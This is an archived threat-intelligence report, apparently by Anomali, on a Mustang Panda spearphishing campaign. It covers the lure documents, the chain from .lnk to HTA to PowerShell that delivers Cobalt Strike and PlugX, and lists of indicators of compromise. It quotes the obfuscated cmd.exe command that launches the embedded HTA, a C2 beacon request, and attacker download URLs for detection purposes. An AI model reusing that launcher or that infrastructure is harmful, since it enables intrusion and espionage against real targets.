{ "id": "4b4bbb42-2168-4db1-929c-9cf8ba7ecefd", "created_at": "2026-04-06T00:15:36.544891Z", "updated_at": "2026-04-10T03:36:33.987982Z", "deleted_at": null, "sha1_hash": "1399399e1e36cc093bb1abae7e381f6604508a02", "title": "China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5139606, "plain_text": "China-Based APT Mustang Panda Targets Minority Groups, Public and\r\nPrivate Sector Organizations\r\nBy Anomali Threat Research\r\nPublished: 2025-12-18 · Archived: 2026-04-05 23:35:50 UTC\r\nAll Posts\r\n13\r\nmin read\r\nThis whitepaper examines a campaign believed to be conducted by China-based threat group, Mustang Panda. Read the\r\npaper from Anomali Threat Research.\r\nPublished on\r\nMustang Panda Overview\r\nTargeting\r\nLure Document Analysis\r\nTargeting Pakistan\r\nTechnical Analysis\r\nConclusion\r\nMustang Panda Overview\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 1 of 15\n\nThe Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group, Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect\r\n19, the company’s annual user conference, in a session titled: “Mustang Panda Riding Across Country Lines.”\r\nCrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of\r\nobserving malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).[1] This campaign dates back\r\nto at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the\r\nimpact the campaign has had. Based on the lure documents observed by Anomali, we believe that the following may be\r\ntargeted:\r\nIndividuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in\r\nIraq and the Levant (ISIL / Da’esh)\r\nMongolian-based MIAT Airlines\r\nNon-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit\r\norganization’s aim is to foster encounters and exchange between cultures and religions in the West and in China\r\nTargeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam\r\nThe Communist Party of Vietnam (CVP)\r\nThe Shan Tai; a group of people living in Southeast Asia, which Minority Rights Group International describes as a\r\n“minority” in the region, with members who are primarily Theravada Buddhists\r\nThe malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike.\r\nThe observed TTPs consist of the following:\r\n1. Use of zip file that contains a “.lnk” (Windows Shortcut) file.\r\n2. Utilization of double extension trick (sample.doc.lnk) to convince users to open the file.\r\n3. HTA (HTML Application) with VBScript embedded in the “.lnk” file\r\n4. VBScript drops payloads and opens a decoy document or PDF to the user.\r\n5. Usage of PlugX and Cobalt Strike payloads.[2]\r\nThe infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.\r\nFigure 1 – Infection vector\r\nWe also found similarities in targeting in Mongolia and an NGO. The use of United Nations’ documents regarding activities\r\nin the Middle East may also be indicative of think-tank targeting. Furthermore, the use of PlugX malware also aligns with\r\nCrowdStrike’s previous findings of activity attributed to Mustang Panda.[3]\r\nAnalysts’ note: The language capabilities to read some of the lure documents is not available within Anomali at this time.\r\nWe would encourage those with the language skills necessary to analyze the documents further.\r\nTargeting\r\nIn mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence\r\ncollection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing\r\nis being utilized because it aligns with Mustang Panda’s TTPs, and it is a common tactic used amongst APT actors. The lure\r\ndocuments are also too specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.\r\nFurther analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a\r\nCobalt Strike Beacon (penetration-testing tool) or PlugX (Remote Access Tool (RAT); other payloads were unable to be\r\nidentified as of this writing. Anomali researchers identified 15 malicious documents that we believe were utilized by\r\nMustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to\r\nAugust 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which will be analyzed\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 2 of 15\n\nfurther in the following sections. In addition, the dates within the documents go back as far as October 8, 2017, therefore, it\r\nis possible this activity goes back to 2017 if the group was using current content in their lures. The primary target of this\r\ncampaign were found to be the ruling political party of Vietnam, The Communist Party of Vietnam (CPV); other targets\r\nobserved in the malicious documents include the following:\r\nCPV of Lang Son province, Vietnam\r\nCPV of Lao Cai province, Vietnam\r\nEmbassy of Vietnam, China\r\nHenan Provincial Party Committee, Vietnam\r\nIndividuals who would find United Nations’ documents of interest, potentially think tanks\r\nMIAT Airlines, Mongolian airline\r\nPolice of Sindh Province, Pakistan\r\nRestoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)\r\nThe China Center (China Zentrum e.V), Germany\r\nThe lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are\r\npublicly available. The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA script that, once\r\nexecuted, will drop and open the decoy document while the malicious activity of the payload runs in the background. Other\r\nlure documents are themed to be relevant to their targets, and in some cases are legitimate documents that are publicly\r\navailable. The final type of malicious document we observed were empty, and only contain an image, such as requesting for\r\nmacros to be enabled, used to distract someone while malicious activity takes place in the background.\r\nLure Document Analysis\r\nThe 15 documents will be discussed below from the most recent VT submission to the earliest. The identified samples\r\nfollow the same infection chain, and the technical analysis will be discussed in a later section.\r\nDocument – 1\r\nDocument Title – TCO BT574.doc\r\nSample – 05CF906B750EB335125695DA42F4EAFC\r\nPayload – Cobalt Strike\r\nSubmission date – 8/29/2019 1:27:41 AM\r\nFigure 2 – TCO BT574.doc\r\nAs seen above, this document is addressed to the Embassy of Vietnam in China. The document appears to discuss a warning\r\nissued to the Vietnam government related to a military exercise on a set of coordinates. Specifically, the document informs\r\nthat no civilian ships are allowed on said coordinates. The document continues and mentions a new ice-breaking ship called\r\n“Snow Dragon 2” and mentions August 15, 2019, as the beginning of a 35-day trial run. This document indicates a regional\r\ninterest with specificity.\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 3 of 15\n\nDocument – 2\r\nDocument Title – 32_1.PDF\r\nSample – 9A180107EFB15A00E64DB3CE6394328D\r\nPayload – Cobalt Strike Beacon\r\nSubmission date – 8/26/2019 6:28:40 AM\r\nFigure 3 – 32_1.pdf\r\nMustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee Lang Son Province.\r\nThe Peoples’ Committee is the executive branch of a Vietnamese province.[4] The Lang Son province shares a border with\r\nChina’s Guangxi Province. The area has historically served as an important location for trade, and therefore control over the\r\nlocation has long been disputed and fought over.\r\n[5]\r\n The border shared between China and Vietnam measures 1,281 km in\r\nlength and multiple wars and numerous lives have been lost in conflicts fought, the complexities and intricacies of which\r\nwill not be further discussed.[6]\r\nDocument – 3\r\nDocument Title – Daily News (19-8-2019)\r\nSample – 5F094CB3B92524FCED2731C57D305E78\r\nPayload – PlugX\r\nSubmission date – 8/19/2019 6:11:32 AM\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 4 of 15\n\nFigure 4 – Daily News (19-8-2019)\r\nThis document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan\r\nState (RCSS). The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in\r\nNorthwestern and Eastern Myanmar (Burma) and the Yunnan province in China.[7] The RCSS, also referred to as Shan State\r\nArmy (SSA), is a government/political organization that is headquartered in Loi Tai Leng, Southern Shan state, in present-day Myanmar (Burma), bordering Thailand.[8]\r\n The targeting of minority groups is a known tactic used by the government of\r\nthe People’s Republic of China.\r\nDocument – 4\r\nDocument Title – S_2019_50_E.lnk\r\nSample – 4FE276EDC21EC5F2540C2BABD81C8653\r\nPayload – PlugX\r\nSubmission date – 6/6/2019 9:37:18 AM\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 5 of 15\n\nFigure 5 – S_2019_50_E.docx\r\nMustang Panda retrieved this document from the United Nations Digital Library that is titled “Letter dated 15 January 2019\r\nfrom the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253\r\n(2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings\r\nand Entities addressed to the President of the Security Council.”[9]\r\nAt the time of this writing, it is unknown who, or what this document may be targeting. However, think-tank organizations\r\nmay be interested in such a document, and said organizations were found to be targets of Mustang Panda by CrowdStrike.\r\n[10]\r\nDocument – 5\r\nDocument Title – European.lnk\r\nSample – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC\r\nPayload – PlugX\r\nSubmission date – 6/5/2019 6:28:25 PM\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 6 of 15\n\nFigure 6 – European.lnk\r\n“European.doc” is targeting The China Center (China Zentrum e.V) is, according to its website, a non-profit organization\r\nthat “encourages encounters and exchange between cultures and religions in the West and in China. The members of the\r\nChina-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”[11]\r\nTargeting of NGOs was first documented by CrowdStrike and we believe we have observed Mustang Panda attempting to\r\nattack a similar type of target.[12] In addition, an institution focused on exchanging cultural knowledge aligns with China’s\r\nstrategic interests.\r\nTargeting Pakistan\r\nUpon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali\r\nfound a malicious sample that targets the Police of the Sindh Province in Pakistan. The PlugX malware has been observed as\r\nthe payload that is targeting the Sindh Province police.\r\nFigure 7 – Samples Connecting to apple-net[.]com\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 7 of 15\n\nFigure 8 – DSR \u0026 CSR of Special Branch Sind.exe\r\nTechnical Analysis\r\nThe “.lnk” files being utilized by MustangPanda typically contain an embedded HTA file with VBscript or PowerShell script\r\nthat, once executed, will drop and open the decoy document while malicious activity of the payload runs in the background.\r\nThroughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.\r\nFigure 9 – Infection vector\r\n“.lnk” File Analysis\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 8 of 15\n\nIn Windows “.lnk” is the file extension for shortcut files which points to an executable file. “.lnk” files usually holds plenty\r\nof forensic artifacts and they can reveal valuable information about the threat actor’s environment. The metadata from the\r\n“.lnk” files led us to pivot to more samples from the same campaign.\r\nFigure 10 – “.lnk” File\r\nTable 1 below shows the files that were part of the recent campaign from Mustang Panda.\r\nTable 1 – Analyzed Samples\r\nMD5Link Creation DateFile NamePayload165F8683681A4B136BE1F9D6EA7F00CE11/21/10 3:24chuong trinh dang\r\nhuong.doc.lnkCobalt strike9FF1D3AF1F39A37C0DC4CEEB18CC37DC11/21/10\r\n3:24European.lnkPlugX4FE276EDC21EC5F2540C2BABD81C865311/21/10\r\n3:24S_2019_50_E.lnkPlugX11ADDA734FC67B9CFDF61396DE98455911/21/10 3:24Chuong trinh hoi nghi.doc.lnkCobalt\r\nstrike08F25A641E8361495A415C763FBB9B7111/21/10 3:24GIAY MOI.doc.lnkCobalt\r\nStrike01D74E6D9F77D5202E7218FA524226C411/21/10 3:24421 CV.doc.lnkCobalt\r\nStrike6198D625ADA7389AAC276731CDEBB50011/21/10 3:24GIAYMOI.doc.lnkCobalt\r\nstrike9B39E1F72CF4ACFFD45F45F08483ABF011/21/10 3:24CV trao doi CAT Cao Bang.doc.lnkCobalt\r\nstrike748DE2B2AA1FA23FA5996F287437AF1B11/20/10\r\n21:29cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnkPlugX5F094CB3B92524FCED2731C57D305E7811/21/10 3:24Daily\r\nNews (19-8-2019)(Soft Copy).lnkPlugX9A180107EFB15A00E64DB3CE6394328D11/21/10 3:2432_1.PDF.lnkCobalt\r\nstrike05CF906B750EB335125695DA42F4EAFC11/21/10 3:24TCO BT 574.doc.lnkCobalt\r\nstrikeF62DFC4999D624D01E94B89946EC103611/21/10 3:24sach tham khao Bo\r\nmon.docx.lnkPlugXCA775717D000888A7F71A5907B9C920811/21/10 3:24tieu luan ve quyen lam chu cua nhan\r\ndan.docx.lnkPlugXAA115F20472E78A068C1BBF739C443BF11/21/10 3:24vai tro cua nhan\r\ndan.doc.lnkPlugX11511b3d69fbb6cceaf1dd0278cbedfb11/21/10 3:24For National Department Sar KNU JMC people\r\nMeeting 2019.lnkPlugX\r\nOnce the user opens the “.lnk” file, the embedded HTA file will be executed via “mshta.exe”, it then writes a PowerShell\r\nscript name “3.ps1” in the “%TEMP%” directory. The PowerShell script is then executed using Windows Management\r\nInstrumentation (WMI) in a hidden window via WMI Tasks.[13]\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 9 of 15\n\nFigure 11 – VBScript drops PowerShell script\r\nFigure 12 – Using WMI to execute PowerShell Script in Hidden window\r\nThe dropped file “3.ps1” is a base64 encoded PowerShell script. Upon execution it performs the below operations on the\r\ntarget host:\r\n1. Checks if the user has Administrator privilege\r\n2. Drops the Cobalt Strike Stager in debug or “%TEMP%” directory as “tmp_FlVnNI.dat” depending on the user\r\nprivilege\r\n3. Opens the decoy Word document\r\n4. Locates the InstallUtil.exe and its installed version\r\n5. Copies “schtasks.exe” to “%TEMP%” directory and renames it to “wtask.exe”\r\n6. Creates Scheduled tasks with the name “Security Script kb00855787”\r\n7. Renames “wscript.exe” into “winwsh.exe”\r\n8. Runs the scheduled task to execute the Cobalt Strike Stager\r\n9. C2 communication\r\nFigure 13 – Scheduled Task Creation\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 10 of 15\n\nFigure 14 – PowerShell Script Creates Scheduled Task\r\nFigure 15 – Cobalt Strike Payload\r\nDuring our analysis, we could not acquire the second stage payload as the C2 servers were not functioning or had been taken\r\ndown by the threat actors.\r\nPlugX Payload Analysis\r\n“.lnk” files that used PlugX as the payload were abnormally big in size. In general, the “.lnk” files are less than 10Kb, but\r\nthe malicious samples in the campaign were more than 700Kb. Upon taking a closer look we found that the “.lnk” files were\r\nembedded with 3 base64 encoded executables.\r\nUpon opening the LNK file, it will then proceed to execute the below command via cmd.exe.\r\ncommand: /c for %x in (%temp%=%cd%) do for /f \"delims==\" %i in ('dir \"%x ieu luan ve quyen lam chu cua nhan\r\ndan.docx.lnk\" /s /b') do start m%windir:~-1,1%hta .exe \"%i\"\r\nThe command executes the HTA file embedded inside the shortcut and it decodes and drops 3 executables in the\r\n“%TEMP%” directory and opens a decoy word document to the user.\r\nFigure 16 – Extracted binaries and Decoy document\r\nAll three dropped files were then moved to a new folder “C:ProgramDataMicrosoft Malware ProtectionGHQ”\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 11 of 15\n\nFigure 17 – Binaries moved to different path\r\nThe “3.exe” is a legitimate executable and it is signed by “ESET, spol. s r.o.” and it is being abused for DLL hijacking\r\ntechnique to execute http_dll.dll which decodes and loads the malicious payload http_dll.dat.\r\nTable 2 – PlugX Hashes\r\nFile NameHash3.exe (original name:\r\nEHttpSrv.exe)28C6F235946FD694D2634C7A2F24C1BAhttp_dll.dll9912EB641EABD640A476720C51F5E3ADhttp_dll.dat2BC7298A57AE2B8AB\r\nAfter the payload execution it reaches out to the C2 via POST request as shown below.\r\nPOST /update?wd=4337295e HTTP/1.1 Accept: */* x-debug: 0 x-request: 0 x-content: 61456 x-storage: 1 User-Agent:\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; Host: aridndvn.ccom:443 Content-Length: 0 Proxy-Connection:\r\nKeep-Alive Pragma: no-cache\r\nIf the C2 is not available the payload tries to reach different embedded C2 domains on unique ports.\r\nFigure 18 – Network connections to C2\r\nConclusion\r\nThe malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. The targets, indicated by\r\nspecific lure documents, are government or align strategically with a China-sponsored APT group. China is currently in its\r\n13th Five-Year Plan (2016-2020) that focus on the following themes: innovation, coordinated development, green growth,\r\nopenness, and inclusive growth, respectively.\r\n[14]\r\n The objective of increasing exports and specific imports, which falls under\r\nopenness, would align with the targeting of the Lang Son province and its history of trade. Utilizing lures themed around\r\npolitical parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of\r\nChina’s development strategy” and attempts of “enhancing its future global competitiveness and technological edge.”[15]\r\nTargeting entities, or related entities, of said lures indicates a potential regional interest in strategic information that may be\r\nof significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by\r\nAnomali.\r\nThis activity has been ongoing since at least November 2018, and possibly as far back to at least October 2017 if the lure\r\ndocuments were distributed around the times mentioned in them. This kind of malicious activity sponsored by China will\r\nlikely continue as the country expands its efforts for the ongoing Belt and Road Initiative that seeks to invest in\r\ninfrastructure in over 100 countries. Such economic and investment-led initiatives will cause China to be more interested in\r\nthe regions its investing in, therefore it is likely that APT-related activity will follow.\r\nIOCs\r\nIn addition, ATR found that the documents were attempting to, or were able to connect to the following Command and\r\nControl (C2) domains and IP addresses:\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 12 of 15\n\nDomainIPsFirst Seenadobephotostage.com50.63.202.946/29/19 22:03adobephotostage.com50.63.202.676/24/19\r\n16:30adobephotostage.com50.63.202.826/7/19 1:31adobephotostage.com184.168.221.946/22/19\r\n3:30adobephotostage.com184.168.221.826/19/19 14:24adobephotostage.com184.168.221.716/10/19\r\n6:57adobephotostage.com50.63.202.736/1/19 9:49adobephotostage.com207.148.12.476/7/18\r\n10:05adobephotostage.com149.28.74.416/4/18 11:33adobephotostage.com207.148.78.1015/31/18\r\n3:26adobephotostage.com149.28.74.1495/24/18 7:19adobephotostage.com50.63.202.595/22/18\r\n20:29olk4.com198.54.117.2009/11/19 23:17olk4.com198.54.117.1998/3/19 1:29olk4.com198.54.117.1978/3/19\r\n1:29olk4.com198.54.117.1988/3/19 1:29olk4.com162.255.119.1507/25/19 8:20apple-net.com167.88.180.1486/12/19\r\n23:41apple-net.com167.88.177.2243/22/19 3:11apple-net.com167.88.180.310/29/18 12:21apple-net.com45.248.87.1410/21/18 18:20apple-net.com91.195.240.1178/6/18 7:08apple-net.com103.224.182.2504/25/18\r\n11:40wbemsystem.com167.88.177.2247/29/19 0:00yahoorealtors.com167.88.178.247/4/19\r\n13:00yahoorealtors.com185.239.226.196/25/19 0:00yahoorealtors.com185.239.226.194/3/19\r\n1:17yahoorealtors.com45.77.209.521/18/18 7:11infosecvn.com167.88.178.1188/27/19\r\n2:14infosecvn.com185.239.226.617/10/18 1:02infosecvn.com45.77.184.125/30/18\r\n16:29airdndvn.com167.88.178.1186/27/19 0:00airdndvn.com185.239.226.616/14/18 9:43airdndvn.com45.77.184.125/31/18\r\n13:50officeproduces.com45.32.50.1507/25/19 7:10web.adobephotostage.com  Web.officeproduces.com:8080\r\n Up.officeproduces.com  We.officeproduces.com  Download.officeproduces.com:443  geocities.jp  update.olk4.com:53\r\n www.cab-sec.com167.88.180.1509/18/2019 3:10 43.254.217.67  154.221.24.47  144.202.54.86\r\nURLs\r\nhttp://144.202.54.86/vkt2\r\nhttp://144.202.54.86/download/Mau2.hta\r\nhttp://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx\r\nhttp://airdndvn.com/6CDC9F833C87FB661DBB9339\r\nhttp://www.wbemsystem.com/B2FC407BB86E8219/397A4853\r\nweb.officeproduces.com:8000/update?wd=1b1fe9aa\r\n154.221.24.47/HaQ3\r\nFile Hashes\r\n165F8683681A4B136BE1F9D6EA7F00CE\r\n9FF1D3AF1F39A37C0DC4CEEB18CC37DC\r\n4FE276EDC21EC5F2540C2BABD81C8653\r\n11ADDA734FC67B9CFDF61396DE984559\r\n08F25A641E8361495A415C763FBB9B71\r\n01D74E6D9F77D5202E7218FA524226C4\r\n6198D625ADA7389AAC276731CDEBB500\r\n9B39E1F72CF4ACFFD45F45F08483ABF0\r\n748DE2B2AA1FA23FA5996F287437AF1B\r\n5F094CB3B92524FCED2731C57D305E78\r\n9A180107EFB15A00E64DB3CE6394328D\r\n05CF906B750EB335125695DA42F4EAFC\r\nF62DFC4999D624D01E94B89946EC1036\r\nCA775717D000888A7F71A5907B9C9208\r\nAA115F20472E78A068C1BBF739C443BF\r\nEndnotes\r\n[1]\r\n Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog,\r\naccessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.\r\n[2]\r\n Ibid.\r\n[3] Ibid.\r\n[4]\r\n Dr. Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016):\r\n5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.\r\n[5]\r\n Kathy Wilheml, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over\r\nFriendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times,\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 13 of 15\n\naccessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.\r\n[6]\r\n “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019,\r\nhttps://www.globalsecurity.org/military/world/vietnam/geography.htm.\r\n[7]\r\n The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019,\r\nhttps://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019,\r\nhttps://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.\r\n[8]\r\n “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018,\r\nhttps://www.mmpeacemonitor.org/1598.\r\n[9]\r\n https://digitallibrary.un.org/record/1663461. Accessed September 18, 2019.\r\n[10]\r\n Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.\r\n[11]\r\n http://www.china-zentrum.de/. Accessed September 18, 2019.\r\n[12]\r\n Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.\r\n[13]\r\n Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019,\r\nhttps://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.\r\n[14]\r\n Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission,\r\naccessed September 20, 2019, published February 14, 2017,\r\nhttps://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf. 3.\r\n[15]\r\n Ibid.\r\nApril 3, 2026\r\nAnomali Cyber Watch\r\nRead More\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 14 of 15\n\nApril 3, 2026\r\nPublic Sector\r\nAnomali Cyber Watch\r\nRead More\r\nApril 2, 2026\r\nAnomali Cyber Watch\r\nRead More\r\nExplore All\r\nSource: https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z" ], "report_names": [ "china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z" ], "threat_actors": [ { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434536, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.pdf", "text": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.txt", "img": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.jpg" } }